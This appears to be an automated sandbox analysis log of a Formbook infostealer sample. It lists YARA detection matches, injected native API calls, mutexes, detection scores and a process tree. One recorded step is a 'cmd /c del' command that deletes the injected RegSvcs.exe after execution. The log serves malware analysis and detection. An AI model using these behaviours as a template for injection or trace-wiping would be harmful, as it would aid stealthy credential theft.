            Source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004181C0 NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00418270 NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004182F0 NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041839A NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A299A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A298F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A295D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A297A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A296E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A299D0 NtCreateProcessEx,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29950 NtQueueApcThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A298A0 NtWriteVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29820 NtEnumerateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A2B040 NtSuspendThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A2A3B0 NtGetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29B00 NtSetValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29A80 NtOpenDirectoryObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29A10 NtQuerySection,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A295F0 NtQueryInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29520 NtWaitForSingleObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A2AD30 NtSetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29560 NtWriteFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29730 NtQueryVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A2A710 NtOpenProcessToken,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29760 NtOpenProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29770 NtSetInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A2A770 NtOpenThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A296D0 NtCreateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29610 NtEnumerateValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29670 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A29650 NtQueryValueKey,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A199A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A195D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A196E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A196D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A198A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A198F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A1B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A195F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A199D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A1AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19560 NtWriteFile,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A197A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A1A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A1A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A19770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A1A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_007881C0 NtCreateFile,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00788270 NtReadFile,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_007882F0 NtClose,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_007883A0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0078839A NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00401030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00401174
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041C124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00408C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041B5D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041C781
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A04120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EF900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A120A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019FB090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA1002
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1EBB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A12581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019FD5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E0D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB1D55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F841F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A06E30
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049EB090
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E841F
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A91002
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A02581
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049ED5E0
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DF900
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D0D20
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049F4120
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA1D55
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049F6E30
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0EBB0
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00778C60
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00772D90
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_00772FB0
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0078C781
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 019EB150 appears 32 times
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 049DB150 appears 32 times
            Source: 9JzK89dRiaBYTuN.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 9JzK89dRiaBYTuN.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 9JzK89dRiaBYTuN.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.348423668.0000000005910000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameStoreElement.dllB vs 9JzK89dRiaBYTuN.exe
            Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameConfigNodeType.dll> vs 9JzK89dRiaBYTuN.exe
            Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341147466.00000000002EC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameObjectEqualityCompar.exe< vs 9JzK89dRiaBYTuN.exe
            Source: 9JzK89dRiaBYTuN.exeBinary or memory string: OriginalFilenameObjectEqualityCompar.exe< vs 9JzK89dRiaBYTuN.exe
            Source: 9JzK89dRiaBYTuN.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 9JzK89dRiaBYTuN.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@14/7
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9JzK89dRiaBYTuN.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_01
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeMutant created: \Sessions\1\BaseNamedObjects\pyRNWsNXUbLJCwrhNfoT
            Source: 9JzK89dRiaBYTuN.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\cmmon32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\cmmon32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: 9JzK89dRiaBYTuN.exeVirustotal: Detection: 57%
            Source: 9JzK89dRiaBYTuN.exeReversingLabs: Detection: 75%
            Source: unknownProcess created: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe 'C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe'
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: 9JzK89dRiaBYTuN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 9JzK89dRiaBYTuN.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: 9JzK89dRiaBYTuN.exeStatic file information: File size 1263616 > 1048576
            Source: 9JzK89dRiaBYTuN.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x126c00
            Source: 9JzK89dRiaBYTuN.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cmmon32.pdb source: RegSvcs.exe, 00000001.00000002.396904315.0000000001D00000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.368212816.000000000DC20000.00000002.00000001.sdmp
